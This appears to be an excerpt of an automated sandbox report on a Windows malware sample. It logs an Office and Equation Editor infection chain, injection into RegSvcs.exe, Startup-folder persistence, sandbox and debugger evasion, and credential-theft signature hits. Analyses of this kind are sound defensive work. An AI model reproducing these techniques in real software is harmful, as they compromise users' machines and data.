Source: C:\Users\user\AppData\Local\directory\name.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0100F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 8_2_0100F98E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01081C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 8_2_01081C41
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0134F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 11_2_0134F98E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 11_2_013C1C41
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\negrett.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\directory\name.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 9_2_004019F0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01001199 sldt word ptr [ecx] 8_2_01001199
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 8861
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Roaming\negrett.exe API coverage: 6.7 %
Source: C:\Users\user\AppData\Local\directory\name.exe API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\directory\name.exe API coverage: 4.4 %
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1376 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00B7DBBE
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B4C2A2 FindFirstFileExW, 5_2_00B4C2A2
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B868EE FindFirstFileW,FindClose, 5_2_00B868EE
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 5_2_00B8698F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0105DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 8_2_0105DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0102C2A2 FindFirstFileExW, 8_2_0102C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0106698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 8_2_0106698F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_010668EE FindFirstFileW,FindClose, 8_2_010668EE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0105D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_0105D076
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0105D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_0105D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0106979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_0106979D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01069642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_01069642
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01069B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 8_2_01069B2B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01065C97 FindFirstFileW,FindNextFileW,FindClose, 8_2_01065C97
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0139DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 11_2_0139DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0136C2A2 FindFirstFileExW, 11_2_0136C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 11_2_013A698F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013A68EE FindFirstFileW,FindClose, 11_2_013A68EE
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0139D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_0139D076
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0139D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_0139D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_013A979D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_013A9642
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 11_2_013A9B2B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013A5C97 FindFirstFileW,FindNextFileW,FindClose, 11_2_013A5C97
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_00B142DE
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00410C4B _LocaleUpdate::_LocaleUpdate,__fileno,__isleadbyte_l,LdrInitializeThunk,__cftof,_strlen,__malloc_crt,__decode_pointer,__decode_pointer,__decode_pointer,__aulldvrm,_write_multi_char,_write_string,_write_multi_char,__cftof,_write_string,_write_string,_write_multi_char, 9_2_00410C4B
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B8EAA2 BlockInput, 5_2_00B8EAA2
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00B42622
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03530715 mov edx, dword ptr fs:[00000030h] 2_2_03530715
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029F40E8 mov eax, dword ptr fs:[00000030h] 5_3_029F40E8
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B34CE8 mov eax, dword ptr fs:[00000030h] 5_2_00B34CE8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01014CE8 mov eax, dword ptr fs:[00000030h] 8_2_01014CE8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00193580 mov eax, dword ptr fs:[00000030h] 8_2_00193580
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_001935E0 mov eax, dword ptr fs:[00000030h] 8_2_001935E0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00191ED0 mov eax, dword ptr fs:[00000030h] 8_2_00191ED0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01354CE8 mov eax, dword ptr fs:[00000030h] 11_2_01354CE8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_005535E0 mov eax, dword ptr fs:[00000030h] 11_2_005535E0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_00553580 mov eax, dword ptr fs:[00000030h] 11_2_00553580
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_00551ED0 mov eax, dword ptr fs:[00000030h] 11_2_00551ED0
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_00B70B62
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B309D5 SetUnhandledExceptionFilter, 5_2_00B309D5
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00B3083F
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00B30C21
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_010109D5 SetUnhandledExceptionFilter, 8_2_010109D5
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01022622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_01022622
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0101083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_0101083F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01010C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_01010C21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_004123F1 SetUnhandledExceptionFilter, 9_2_004123F1
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013509D5 SetUnhandledExceptionFilter, 11_2_013509D5
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_01362622
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_0135083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0135083F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_01350C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_01350C21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01051201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 8_2_01051201
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B52BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 5_2_00B52BA5
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0105B226 SendInput,keybd_event, 8_2_0105B226
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 5_2_00B922DA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Users\user\AppData\Roaming\negrett.exe Process created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_00B70B62
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01051663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 8_2_01051663
Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp, negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp, negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: name.exe Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_3_029EFA98 cpuid 5_3_029EFA98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetLocaleInfoA, 9_2_00417A20
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B4333F GetSystemTimeAsFileTime, 5_2_00B4333F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0104D27A GetUserNameW, 8_2_0104D27A
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0102B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 8_2_0102B952
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_00B142DE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
